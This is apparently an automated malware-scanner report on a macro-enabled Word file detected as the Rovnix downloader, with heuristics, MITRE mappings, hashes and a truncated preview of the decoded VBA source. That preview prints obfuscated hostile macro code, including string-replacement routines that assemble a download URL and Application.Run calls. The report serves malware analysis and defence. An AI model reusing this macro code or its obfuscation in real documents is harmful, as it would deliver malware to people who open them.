MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that uses CreateObject to execute code. ClamAV identifies the file as Doc.Downloader.Rovnix-6497736-0, indicating a downloader family. The VBA code, though obfuscated, contains calls to Application.Run, suggesting it's designed to execute further malicious actions, likely downloading a payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14386 bytes |
SHA-256: 13165f5940627566da4fae44e2b6ea301519d4f1e9c0d7b561a15ba97c04b1a7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub yfdkwJYAbVJLQv()
NzyHEvQBx = Acos(1508) - Acos(162) - Acos(1807) - Acos(2788) - 4087 - Acos(1289) - 2506
WZAoVQBLzi = LTrim("GFLAAMAoufEyoWQXQWH") + LTrim("FSSIbYKcOiExnALzvBQGIug") + "wYcvNAHnYwnprGPfy" + RTrim("QvbxYNPkSZMKNHUb")
iFUwBrzI = RTrim("ROMIgzRoRTcRkVvbUViWjNAgNLNL") + "ojWFRWxEgTwxinMbDJPWvzxgkoUY"
AWXiyQiygdK = "gUFwrZHgEyIJGAgcJZcWAwUxk" + "HCJTUAZHQGiqEPbBRxirTozwxJwNID" + "iGuFwrnn" + RTrim("FrKWMZVXSJio")
ByqOkOSCObZ = LTrim("MAoVy") + RTrim("PuVvWEgPojoDfrCvEEHIZXPoB")
Application.Run "giCTYCBYxZEKTw"
bPqHVEJEEYNB = "SOxBqHNcIrg" + Left("CUVbCWIOXE", 10) + Left("GbQLxgPVQq", 4) + "JKxingMridcxdqL" + "EMLNUzfXHWSqcN"
XBKDUxBPFik = Acos(1477) + Acos(3775) + 4212 + Acos(3440) + 1944 + 162
End Sub
Sub fZiPfMZyyirJIX()
nzGkLRgQ = "BYOfbWKPodfrnHTIDowoqkyf" + LTrim("YAbVJLQvgiCTYCBYxZEK") + RTrim("EQWgZbzrwryV")
iPfMZyyirJIX = 2946 - 824 - Acos(1432) - 1593 - Acos(3901)
GkkqyzNYGV = "qJvoKfPbxKkoHpDxcjpIW" + LTrim("SukBRfkbCiIVNzgTTzMdNicpLYnIFX") + "DSxYJbKMQycOWFozFGyHIf"
Application.Run "TAujwkNOTyHRfBx"
OgISkDzKWHJ = 39 + Acos(3113) + 4588 + Acos(4635) + 2130 + Acos(860)
dkJyJwguqz = "qoEQRwCVn" + "NFxnpfYvf" + LTrim("uYK") + "RF"
OcGTWACNvdH = RTrim("pNgW") + "bjp" + "ToUQKqTiqiCXNZ" + LTrim("EvnjiwUyPMRDryHoZS")
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function dXWgMfjVpCXpXZvKC(VrgOHYkMAIHkq, bTznDbOFKvHPFc, PRTOfDZpIpkIUgJOR)
NXPbBbYGu = "KoSPuucMbz" + "igOgDUdVnXELq" + "uxOEzJN" + "nvN" + "HTIVWiMG"
QvHBHPB = "f" + "ocBDRFLqNfNQrfJwvDbJnSYUO"
GGUAHCvuvSyg = Acos(4199) - Acos(2388) - 1101
CJkpyikVgRi = Left("PryyDxiVOO", 2) + "KkipzjKb" + Left("HCbYxMQZXq", 7) + "TcVvi"
dXWgMfjVpCXpXZvKC = Replace(VrgOHYkMAIHkq, bTznDbOFKvHPFc, PRTOfDZpIpkIUgJOR)
BWAToDfUP = Left("PUZYYnIXJF", 5) + "bUoLCOvWAwqfXV" + Left("IiEBFpciwY", 8) + "DQvIKnoBd" + Left("RddQSBWiuK", 10)
ZKzJbwjoQAqI = Acos(2880) + 879 + 639
vOJHwOpr = Acos(680) + 489 + Acos(4165) + Acos(3316)
UCzqSixukYX = Left("PqrXqqANFd", 3) + Left("TEJwzKpFVB", 7) + "CEiYH"
wcYFCwvR = 3819 + 51 + Acos(2823) + 4502
WROfuUViv = 1560 - Acos(1685) - 3322 - 1505 - 364
qHnUHLgfqkgN = Acos(1809) + 1501 + 3451 + 2168
qngbIgoIBH = "iPLZoVgbpZNwKkRUBbfWgHNvFECBrW" + RTrim("LLYUdZwkAyU") + "FPDuQPibIUIkBnkJrrEOHq" + LTrim("bQZNdWDVQdxvydFIIqCSLE")
iooXWQORP = Acos(1682) + 894 + 2776 + Acos(3606) + 1993 + 4001 + Acos(4352)
vdCgnNR = RTrim("rborHnruAIywnOILMG") + "FxDQJGWGv" + RTrim("dWRTdzBiSNPUCbGdJd")
CUfNgJcP = "AzynzTEKX" + RTrim("QzcbCIKD") + "yAwOWWu" + RTrim("NuJQTdbPwvzKSSiYyRcJHXAjF")
CZTNwxRT = Acos(2583) + Acos(1968) + 2725
TMJoKBTD = "qVKrYxVP" + Left("jPPFiGrWdd", 7) + Left("GzujXBXpFu", 6)
End Function
Sub TAujwkNOTyHRfBx()
RpJONvqHo = Acos(927) + 2621 + Acos(2438) + Acos(3396) + 3733 + 2343 + Acos(1548)
VjSzovVzfNb = "WVLgBwJxEDkAf" + "IOwSfFVxWy" + "Wiuq"
qXnioRTAEXy = "LoiVKZ" + "ndnBUIfMLcAY" + Left("fqBSyZijnk", 3)
AEXZWwzqWC = "SFCKrfvbxxzFKjgO" + "FSEdBx"
qobqgYZuTHuonAx = "ZbHyKOuornUnoopqOUzUwjWBhZuTnHAMiqcNACdHjdRkucQxo hZuTnHAMiqcNAZuTnHAMiqcNAp://qdkngijbqnwnQObPYpWycAZhiqwrbzudwnQObPYpWycAZ.coZbHyKOuornUn/REX/oopqOUzUwjWBFDxoJqUwTGCvick.php?uZuTnHAMiqcNAZbHyKOuornUnCdHjdRkucQxo=boZbHyKOuornUnb"
qobqgYZuTHuonAx = dXWgMfjVpCXpXZvKC(qobqgYZuTHuonAx, "ZbHyKOuornUn", "m")
uKRNUvNipoSO = Left("JWITLciczk", 10) + "kOqy"
YTjTcZLWHA = 3095 - Acos(2909) - 1953
VNcHLRi = LTrim("BRrPC") + RTrim("AIVDowIXXUxjoZFGgSXkokWAK") + LTrim("L") + LTrim("vuvpfUYqJWVHwXoAdWDDfrUc")
IbBNJIjJVQw = 3277 - Acos(1437) - 362 - 3558 - Acos(2641)
qobqgYZuTHuonAx = dXWgMfjVpCXpXZvKC(qobqgYZuTHuonAx, "CdHjdRkucQxo", "a")
vxOuRnMIykCi = Acos(2841) - 4323 - Acos(2167) - Acos(2103) - 3757 - 2019 - Acos(4505) - 1981 - 1147
iMdvbGYUFdW = "iHnnFWCkcHOX" + LTrim("KLLOLuPBLINvwXbAViJ") +
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |
SHA-256: 556e18a1bec0615e10511745cd9c66c14d3ffd1b0050771fc3e9492abb820850 |
|||
|
Detection
ClamAV:
Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.